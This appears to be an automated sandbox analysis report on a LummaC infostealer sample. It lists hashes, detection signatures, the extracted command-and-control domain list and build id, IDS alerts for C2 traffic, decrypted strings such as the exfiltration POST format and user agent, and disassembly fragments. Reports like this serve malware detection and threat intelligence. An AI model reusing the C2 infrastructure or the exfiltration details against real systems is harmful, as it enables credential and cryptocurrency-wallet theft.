Windows Analysis Report
5Z19n7XRT1.exe

Overview

General Information

Sample name: 5Z19n7XRT1.exe (renamed because the original name is a hash value)
Original sample name: fb4f1803fbfc70bc55b61bf418d52d3d.exe
Analysis ID: 1581620
MD5: fb4f1803fbfc70bc55b61bf418d52d3d
SHA1: 056d8ee3e8a88bec928c8cd56efe606400262ffb
SHA256: dcb4c992866efa672aa8b755cb1496eff39fc6c504c88eee5525c0a46bee1c9e
Tags: exe, user-abuse_ch
Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 5Z19n7XRT1.exe (PID: 3524 cmdline: "C:\Users\user\Desktop\5Z19n7XRT1.exe" MD5: FB4F1803FBFC70BC55B61BF418D52D3D)
    • WerFault.exe (PID: 6212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["scentniej.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1750:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Source | Rule | Description | Author | Strings
0.2.5Z19n7XRT1.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.3.5Z19n7XRT1.exe.24e0000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.2.5Z19n7XRT1.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.3.5Z19n7XRT1.exe.24e0000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T09:58:57.685554+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T09:59:00.099091+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:02.275276+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:04.694621+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49722 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:07.099147+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49728 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:09.553637+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49737 | 172.67.157.254 | 443 | TCP
2024-12-28T09:59:00.824979+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:03.052008+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:00.824979+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:03.052008+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-28T09:58:55.752380+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59569 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:54.873140+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63909 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.898293+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 61581 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.466978+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54375 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.018066+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 56116 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.160830+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54503 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.305197+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 64950 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.609799+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54142 | 1.1.1.1 | 53 | UDP
2024-12-28T09:59:05.741502+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49722 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:10.530843+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49737 | 172.67.157.254 | 443 | TCP
2024-12-28T09:58:58.472225+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP


AV Detection

Source: https://scentniej.buzz/IP | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api1Wu | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/KP | Avira URL Cloud: Label: malware
Source: https://scentniej.buzz/ | Avira URL Cloud: Label: malware
Source: https://rebuildeso.buzz/ | Avira URL Cloud: Label: malware
Source: https://screwamusresz.buzz/api3 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/.co.jp | Avira URL Cloud: Label: malware
Source: https://scentniej.buzz/api | Avira URL Cloud: Label: malware
Source: 0.3.5Z19n7XRT1.exe.24e0000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}
Source: 5Z19n7XRT1.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 5Z19n7XRT1.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4h5VfH--
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00415298 CryptUnprotectData | 0_2_00415298

Compliance

Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Unpacked PE file: 0.2.5Z19n7XRT1.exe.400000.0.unpack
Source: 5Z19n7XRT1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ebx, byte ptr [edi+eax] | 0_2_00415298
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov word ptr [eax], dx | 0_2_00415298
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h | 0_2_0043CB20
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h | 0_2_0043CD60
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, edx | 0_2_0040BDC9
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [edi], al | 0_2_0040CFF3
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h] | 0_2_0040CFF3
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp al, 2Eh | 0_2_00426054
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp eax | 0_2_00426054
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 0_2_0043B05D
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_0043B05D
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 0_2_0043B068
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_0043B068
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh] | 0_2_0040E83B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 0_2_0043B05B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_0043B05B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0040A940
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edx, ecx | 0_2_0040A940
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h] | 0_2_0040C917
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp ecx | 0_2_0043C1F0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 0_2_00425990
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ecx, di | 0_2_00425990
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_0043B195
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movsx eax, byte ptr [esi] | 0_2_0043B9A1
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh | 0_2_004369A0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+edx] | 0_2_0041E9B0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_004299B0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then lea eax, dword ptr [esp+18h] | 0_2_0042526A
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ebx, edi | 0_2_0041D270
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov esi, eax | 0_2_00423A34
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h | 0_2_0043D2F0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 0_2_0043D2F0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp ecx | 0_2_0043C280
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0043AAB2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 0_2_004252BA
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 0_2_004252BA
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov eax, ebx | 0_2_0041CB05
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edx, eax | 0_2_00427326
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_004143C2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edi, dword ptr [esp+34h] | 0_2_004143C2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 0_2_0042A3D0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0042C45C
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ebp, dword ptr [eax] | 0_2_00436C00
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 0_2_0042B4FC
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0042B4FC
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, dword ptr [esi+64h] | 0_2_00418578
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edx, eax | 0_2_0042750D
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_00421D10
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [edx+ecx] | 0_2_0040DD25
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh] | 0_2_00417582
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h] | 0_2_00427DA2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h | 0_2_004205B0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_0042C64A
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0042AE48
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp eax | 0_2_00426E50
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 0_2_0042B4F7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0042B4F7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0042AE24
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_00433630
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_0042C6E4
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 0_2_00425E90
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h | 0_2_0043CE90
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_004166A0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_0041BEA0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0042ADF4
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov eax, edx | 0_2_0041C6BB
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp eax | 0_2_0043BF40
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h] | 0_2_00415F66
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 0_2_00419770
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edx, dword ptr [ebp-10h] | 0_2_0043A777
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h] | 0_2_00409700
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h] | 0_2_00409700
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h] | 0_2_00409700
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_0042C726
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_0042C735
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 0_2_0041DF80
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 0_2_0040D7A2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 0_2_0040D7A2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [edi], al | 0_2_0249D25A
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h] | 0_2_0249D25A
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp eax | 0_2_024CC268
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 0_2_024CB2CF
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_024CB2CF
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 0_2_024CB2C4
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_024CB2C4
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 0_2_024CB2C2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_024CB2C2
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 0_2_024CB3FC
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp al, 2Eh | 0_2_024B63B6
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, edx | 0_2_0249C030
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp eax | 0_2_024B70E4
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h | 0_2_024CD0F7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 0_2_024B60F7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_024BB08B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_024BB0AF
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_024BB05B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 0_2_024AE1E7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 0_2_024BA637
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_024BC6C3
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 0_2_024BB763
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_024BB763
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp eax | 0_2_024B6739
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, dword ptr [esi+64h] | 0_2_024A87DF
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh] | 0_2_024A77E9
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then jmp ecx | 0_2_024CC79B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edx, eax | 0_2_024B7797
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then lea eax, dword ptr [esp+18h] | 0_2_024B54D1
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ebx, edi | 0_2_024AD4D7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ebx, byte ptr [edi+eax] | 0_2_024A554C
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h] | 0_2_024A6544
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h | 0_2_024CD557
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 0_2_024CD557
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_024AC528
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 0_2_024B552B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 0_2_024B559D
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 0_2_024B55B3
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 0_2_0249DA09
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 0_2_0249DA09
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh] | 0_2_0249EAA2
